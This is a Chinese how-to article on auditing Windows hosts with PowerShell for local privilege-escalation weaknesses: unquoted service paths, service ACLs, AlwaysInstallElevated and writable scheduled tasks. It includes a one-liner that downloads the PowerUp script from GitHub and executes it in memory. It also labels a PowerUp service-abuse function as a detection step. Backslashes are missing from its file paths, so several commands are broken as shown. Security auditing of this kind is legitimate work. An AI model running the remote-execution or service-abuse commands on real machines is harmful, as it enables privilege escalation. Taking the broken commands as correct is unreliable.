Windows 怎么用 PowerShell 检测当前用户组是否存在提权漏洞

冷漠man

冷漠man

2026-07-23

378人浏览

原创

powershell检测提权漏洞核心是识别本地权限配置缺陷,包括:一、检查未加引号且含空格的服务路径及其写权限;二、扫描服务配置权限是否允许低权限用户修改高权限服务路径;三、验证alwaysinstallelevated注册表项是否启用;四、查找可写且由高权限账户执行的计划任务路径。

直接用 powershell 检测当前用户组是否存在提权漏洞,核心是识别本地权限配置缺陷,而非单纯查“属于哪些组”。关键不在于组名本身,而在于该组是否被赋予了可被滥用的高危权限(如对服务、注册表、计划任务、可写路径等的不当控制)。以下方法聚焦实战中真正有效的检测路径:

一、检查服务路径与权限(Trusted Service Paths)

如果当前用户所属组对未加引号的服务路径有写权限,就可能通过覆盖子目录中的可执行文件实现提权。

  • 运行命令列出所有自动启动、路径含空格且未加引号的服务:
    Get-WmiObject Win32_Service | Where-Object {$_.StartMode -eq "Auto" -and $_.PathName -notmatch '"'} | Select-Object Name, DisplayName, PathName
  • 对每个路径,用 icacls 检查当前用户是否有写权限:
    icacls "C:Program FilesSomeService" 2>&1 | findstr /i "yourusername|BUILTINUsers|Everyone"
  • 若返回结果含 (F)(完全控制)或 (M)(修改),即存在风险。

二、扫描服务配置权限(Service Permissions)

低权限用户若能修改高权限服务的二进制路径,就能在服务重启时以 SYSTEM 权限执行任意代码。

  • 使用 PowerUp 脚本一键检测:
    IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-ServiceAbuse -ShowAll
  • 或手动检查关键服务(如 wlms、wuauserv)的 ACL:
    sc qc wlms | findstr "BINARY_PATH_NAME"<br>icacls "C:WindowsSystem32wlms.exe"
  • 重点看是否允许 BUILTINUsers 或当前用户组拥有 SERVICE_CHANGE_CONFIG 权限。

三、验证 AlwaysInstallElevated 注册表项

若该策略启用,任何用户(包括标准用户)都能以 SYSTEM 权限安装 MSI 包,是经典提权入口。

讯飞听见 Win
讯飞听见 Win

PHP中文网为您提供讯飞听见Windows客户端官方下载与安装部署指南。作为科大讯飞旗下的智慧办公SaaS平台,我们为您整理了通过官方渠道安全获取最新完整版安装包(支持Win7至Win11系统)的核心入口。同时,详细梳理了客户端的核心功能与使用技巧,涵盖实时录音转文字、音视频文件批量导入转写、AI智能会议纪要生成、多语种实时翻译及屏幕录制等。

下载
  • 检查两项注册表键值:
    Get-ItemProperty "HKLM:SOFTWAREPoliciesMicrosoftWindowsInstaller" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue<br>Get-ItemProperty "HKCU:SOFTWAREPoliciesMicrosoftWindowsInstaller" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue
  • 若任一返回值为 1,即存在漏洞。无需额外权限即可触发。

四、查找可写计划任务与高权限执行上下文

某些计划任务由 SYSTEM 或 Administrator 运行,但其执行文件路径对当前用户可写,可替换后等待触发。

  • 列出所有高权限任务:
    schtasks /query /fo LIST /v | findstr /i "Administrator|SYSTEM|NT AUTHORITY\SYSTEM"
  • 提取任务对应的程序路径,再用 Test-PathGet-Acl 验证可写性:
    Get-Acl "C:Tasksmalware.exe" | fl AccessToString
  • 也可用 PowerUp:
    Invoke-AllChecks | Select-String -Pattern "Writeable Task File"

不复杂但容易忽略:这些检测都依赖当前会话的实际权限上下文。确保以目标用户身份运行 PowerShell(非管理员),才能真实反映其可利用面。工具如 PowerUp、Sherlock、WES-NG 可大幅压缩判断时间,但手工验证仍是确认漏洞可利用性的最终依据。

相关文章

PHP速学视频免费教程(入门到精通)
PHP速学视频免费教程(入门到精通)

PHP怎么学习?PHP怎么入门?PHP在哪学?PHP怎么学才快?不用担心,这里为大家提供了PHP速学教程(入门到精通),有需要的小伙伴保存下载就能学习啦!

下载

相关标签:

本站声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn

相关专题

更多
墨刀AI提示词教学
墨刀AI提示词教学

本合集由PHP中文网精心整理,为您提供全面的墨刀AI提示词教学。内容涵盖高质量原型撰写公式与实操窍门,助您轻松掌握AI设计工具。无论是零基础入门还是进阶技巧,都能让您快速上手,大幅提升产品设计与协作效率。

2026.08.04

8

21

墨刀AI完整入门
墨刀AI完整入门

PHP中文网为您倾力打造墨刀AI保姆级入门指南完整版!本合集从零基础讲起,涵盖AI生成原型、提示词优化、图片转原型及多轮对话等核心功能。无论您是新手还是进阶用户,都能轻松掌握产品设计全流程。快来PHP中文网,一键解锁高效设计技巧,让想法即刻成型!

2026.08.04

3

20

墨刀AI进阶技巧
墨刀AI进阶技巧

本合集由PHP中文网精心整理,为您提供墨刀AI核心进阶策略指南。内容涵盖高效提示词写作、原型智能生成与微调、结构化导图制作及行业分析报告输出等实战技巧。助您轻松掌握AI设计工具,大幅提升产品设计与团队协作效率。

2026.08.04

7

14

火山引擎实名认证失败怎么办
火山引擎实名认证失败怎么办

火山引擎实名认证失败可能与证件信息填写错误、姓名或企业信息不一致、证件照片不清晰、营业执照状态异常、手机号验证失败或审核资料不完整有关。本专题整理个人认证、企业认证、资料上传、审核退回、重新提交和认证不通过的常见处理方法。

2026.08.04

4

10

火山引擎域名备案流程详解
火山引擎域名备案流程详解

火山引擎域名备案适合需要在火山引擎云服务器、对象存储、CDN或网站服务上绑定域名的用户参考。本专题整理备案入口、账号实名认证、备案类型选择、主体信息填写、网站信息提交、资料上传、初审核验、管局审核和备案失败排查,帮助用户完成网站上线前的备案流程。

2026.08.04

0

10

火山引擎DNS解析配置步骤
火山引擎DNS解析配置步骤

使用火山引擎DNS解析网站域名时,需要确认域名已完成管理接入,并正确配置服务器IP、CNAME地址或验证记录。本专题整理域名添加、记录类型选择、TTL设置、解析状态检查、备案和访问测试等流程,适合新手搭建网站时参考。

2026.08.04

2

10

火山引擎对象存储使用教程
火山引擎对象存储使用教程

火山引擎对象存储适合用于网站图片、视频文件、备份数据、静态资源和应用附件管理。本专题整理TOS控制台入口、存储桶创建、地域选择、权限设置、文件上传、访问链接生成、CDN加速、费用查看和常见上传或访问失败问题,帮助用户快速掌握对象存储基础操作。

2026.08.04

1

10

火山引擎云服务器使用教程
火山引擎云服务器使用教程

火山引擎云服务器使用教程适合第一次购买、部署和管理云服务器的用户参考。本专题整理控制台入口、实例创建、地域和配置选择、系统镜像设置、安全组放行、远程连接、网站部署、续费计费和常见连接失败问题,帮助用户快速完成云服务器基础使用流程。

2026.08.04

5

10

火山引擎API Key绑定大模型教程
火山引擎API Key绑定大模型教程

火山引擎API Key怎么绑定大模型适合需要在火山方舟、应用后台、脚本工具或AI编程软件中调用模型的开发者参考。本专题整理控制台服务开通、API Key创建、模型权限检查、模型ID选择、Base URL填写、调用测试和鉴权失败排查,帮助用户完成从密钥到模型调用的配置流程。

2026.08.04

2

10

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程